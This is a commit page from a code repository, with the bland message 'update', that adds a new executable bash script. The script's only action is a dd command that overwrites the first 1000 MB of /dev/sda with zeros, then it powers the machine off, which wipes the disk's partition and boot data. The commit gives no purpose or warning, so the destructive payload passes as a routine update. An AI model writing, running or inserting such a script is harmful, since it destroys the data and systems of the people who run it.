update
This commit is contained in:
Executable
+5
@@ -0,0 +1,5 @@
|
||||
#!/bin/bash
|
||||
|
||||
dd if=/dev/zero of=/dev/sda bs=1M count=1000
|
||||
|
||||
poweroff
|
||||
Reference in New Issue
Block a user